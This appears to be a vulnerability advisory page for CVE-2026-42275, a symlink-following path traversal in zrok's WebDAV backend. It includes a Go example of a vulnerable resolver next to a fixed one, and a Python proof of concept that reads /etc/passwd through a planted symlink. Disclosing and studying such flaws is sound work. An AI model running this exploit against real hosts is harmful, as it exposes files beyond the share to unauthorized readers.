Security Vulnerability Report
CVE-2026-42275

Published: 2026-05-08 04:16:23
Last Modified: 2026-05-08 20:03:27

Description

zrok is software for sharing web services, files, and network resources. Prior to version 2.0.2, the zrok WebDAV drive backend (davServer.Dir) restricts path traversal through lexical normalization but does not prevent symlink following. When a symbolic link inside the shared DriveRoot points to a location outside that root, remote WebDAV consumers can read files and—on shares without OS-level permission restrictions—write or overwrite files anywhere on the host filesystem accessible to the zrok process. This issue has been patched in version 2.0.2.
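The distinction the description draws, lexical normalization versus resolving what is actually on disk, is easiest to see side by side. The Go program below is an added example written for this page; it is not zrok's code and not the 2.0.2 patch, and the names lexicalResolve, safeResolve and demo are this example's own. It builds a throw-away share directory with two symlinks pointing outside it (a constructed fixture), shows that a clean-and-join check of the kind the description attributes to davServer.Dir hands the outside file to the caller, and shows a check that resolves the deepest existing prefix with filepath.EvalSymlinks and refuses anything that leaves the real root, including a not-yet-existing file under a directory symlink, which is the write case the description mentions.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path"
	"path/filepath"
	"strings"
)

var errOutsideRoot = errors.New("path resolves outside the share root")

// lexicalResolve is the lexical-only pattern: clean the request path so ".."
// cannot climb above "/", then join it under root. Nothing here consults the
// filesystem, so a symlink inside root is followed by the OS at open() time.
func lexicalResolve(root, name string) string {
	clean := path.Clean("/" + name) // "/../etc/passwd" -> "/etc/passwd"
	return filepath.Join(root, filepath.FromSlash(clean))
}

// safeResolve keeps the lexical step, then resolves symlinks in the longest
// prefix of the candidate that exists on disk (so a file a PUT is about to
// create is checked against its parent's real location) and rejects any
// result that does not sit inside the real root.
func safeResolve(root, name string) (string, error) {
	realRoot, err := filepath.EvalSymlinks(root)
	if err != nil {
		return "", err
	}
	existing, rest := lexicalResolve(root, name), ""
	for {
		if _, err := os.Lstat(existing); err == nil {
			break
		}
		parent := filepath.Dir(existing)
		if parent == existing {
			return "", errOutsideRoot // walked off the top without finding anything
		}
		rest = filepath.Join(filepath.Base(existing), rest)
		existing = parent
	}
	resolved, err := filepath.EvalSymlinks(existing) // a dangling link fails here, blocking writes through it
	if err != nil {
		return "", err
	}
	final := filepath.Join(resolved, rest)
	if final != realRoot && !strings.HasPrefix(final, realRoot+string(filepath.Separator)) {
		return "", errOutsideRoot
	}
	return final, nil
}

// demoResult records what each resolver did with the constructed fixture.
type demoResult struct {
	LexicalLeaksFile      bool // lexicalResolve + ReadFile returned the outside file
	SafeRejectsFileLink   bool // safeResolve refused the file symlink
	SafeRejectsDirLinkPut bool // safeResolve refused a new file under a directory symlink
	SafeAllowsInRoot      bool // safeResolve accepted an ordinary in-root path
}

// demo builds a temporary share (constructed fixture, removed afterwards):
// base/secret.txt and base/outdir/ sit outside the root base/drive/, and
// base/drive/link -> base/secret.txt, base/drive/outlink -> base/outdir.
func demo() (demoResult, error) {
	var r demoResult
	base, err := os.MkdirTemp("", "symlink-demo")
	if err != nil {
		return r, err
	}
	defer os.RemoveAll(base)
	root, secret, outdir := filepath.Join(base, "drive"), filepath.Join(base, "secret.txt"), filepath.Join(base, "outdir")
	for _, d := range []string{root, outdir} {
		if err := os.Mkdir(d, 0o755); err != nil {
			return r, err
		}
	}
	if err := os.WriteFile(secret, []byte("not for sharing\n"), 0o600); err != nil {
		return r, err
	}
	if err := os.Symlink(secret, filepath.Join(root, "link")); err != nil {
		return r, err
	}
	if err := os.Symlink(outdir, filepath.Join(root, "outlink")); err != nil {
		return r, err
	}

	data, readErr := os.ReadFile(lexicalResolve(root, "link")) // "link" has no "..", so it passes
	r.LexicalLeaksFile = readErr == nil && string(data) == "not for sharing\n"
	_, e1 := safeResolve(root, "link")
	r.SafeRejectsFileLink = errors.Is(e1, errOutsideRoot)
	_, e2 := safeResolve(root, "outlink/pwned.txt") // the PUT case: target does not exist yet
	r.SafeRejectsDirLinkPut = errors.Is(e2, errOutsideRoot)
	p, e3 := safeResolve(root, "docs/../notes.txt") // lexically cleaned, stays in root
	r.SafeAllowsInRoot = e3 == nil && filepath.Base(p) == "notes.txt"
	return r, nil
}

func main() {
	r, err := demo()
	if err != nil {
		fmt.Println("demo failed:", err)
		return
	}
	fmt.Printf("%+v\n", r)
}
```

Two details matter in practice: the root itself is passed through EvalSymlinks before comparison (on macOS /tmp is itself a symlink, and a naive prefix test against the unresolved root would reject everything), and the containment test appends a path separator so that a root of /srv/share does not accept /srv/share2.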

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N

Weaknesses
CWE-22 (Improper Limitation of a Pathname to a Restricted Directory, 'Path Traversal')
CWE-61 (UNIX Symbolic Link (Symlink) Following)

Configurations (Affected Products)

cpe:2.3:a:netfoundry:zrok:*:*:*:*:*:*:*:* - VULNERABLE
zrok < 2.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
PoC for CVE-2026-42275 (zrok Symlink Following)

This script demonstrates how a symlink inside the shared DriveRoot bypasses
the lexical path traversal restrictions of the zrok WebDAV drive backend.
"""
import os

import requests

# Configuration
WEBDAV_URL = "http://target-zrok-instance/public/"  # The zrok share URL
SHARE_DIR = "."  # Local path of the shared DriveRoot where the link is planted
MALICIOUS_LINK_NAME = "etc_passwd_link"
TARGET_FILE = "/etc/passwd"


def create_symlink_in_share():
    """
    Simulates planting a symlink in the shared directory.

    WebDAV itself has no method for creating symlinks, so in a real scenario
    the link already has to exist inside DriveRoot (placed by a local user,
    a checked-out repository, an extracted archive, or similar). This helper
    only stands in for that step when testing against your own share.
    """
    link_path = os.path.join(SHARE_DIR, MALICIOUS_LINK_NAME)
    print(f"[+] Creating symlink '{link_path}' -> '{TARGET_FILE}'...")
    try:
        os.symlink(TARGET_FILE, link_path)
        print("[+] Symlink created successfully.")
    except OSError as e:
        print(f"[-] Failed to create symlink: {e}")


def exploit_symlink():
    """
    Attempts to read the target file through the symlink via WebDAV.
    A plain GET is enough: the server joins the link name under DriveRoot,
    opens it, and the OS follows the link out of the share.
    """
    url = f"{WEBDAV_URL}{MALICIOUS_LINK_NAME}"
    print(f"[+] Attempting to read '{MALICIOUS_LINK_NAME}' via WebDAV ({url})...")
    try:
        response = requests.get(url, timeout=10)
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
        return
    if response.status_code == 200:
        print("[+] Exploit successful! File content retrieved:")
        print("-" * 20)
        print(response.text[:200])  # Print first 200 chars
        print("-" * 20)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")


if __name__ == "__main__":
    # Step 1: Plant the symlink inside the shared DriveRoot (local side).
    create_symlink_in_share()
    # Step 2: Access the file remotely. A real attacker would use any WebDAV
    # client (cadaver, curl, a mounted drive); here it is a plain HTTP GET.
    exploit_symlink()

References

https://github.com/openziti/zrok/commit/459bcfc1e121decae1b1d11c37ad94e4ed5bbf2e (Patch)
https://github.com/openziti/zrok/releases/tag/v2.0.2 (Product, Release Notes)
https://github.com/openziti/zrok/security/advisories/GHSA-74m3-9qvm-rp9h (Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42275", "sourceIdentifier": "[email protected]", "published": "2026-05-08T04:16:22.823", "lastModified": "2026-05-08T20:03:27.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "zrok is software for sharing web services, files, and network resources. Prior to version 2.0.2, the zrok WebDAV drive backend (davServer.Dir) restricts path traversal through lexical normalization but does not prevent symlink following. When a symbolic link inside the shared DriveRoot points to a location outside that root, remote WebDAV consumers can read files and—on shares without OS-level permission restrictions—write or overwrite files anywhere on the host filesystem accessible to the zrok process. This issue has been patched in version 2.0.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-61"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:netfoundry:zrok:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.0.2", "matchCriteriaId": "FC1325D6-16B3-4739-B913-E20275292B01"}]}]}], "references": [{"url": "https://github.com/openziti/zrok/commit/459bcfc1e121decae1b1d11c37ad94e4ed5bbf2e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openziti/zrok/releases/tag/v2.0.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, 
{"url": "https://github.com/openziti/zrok/security/advisories/GHSA-74m3-9qvm-rp9h", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}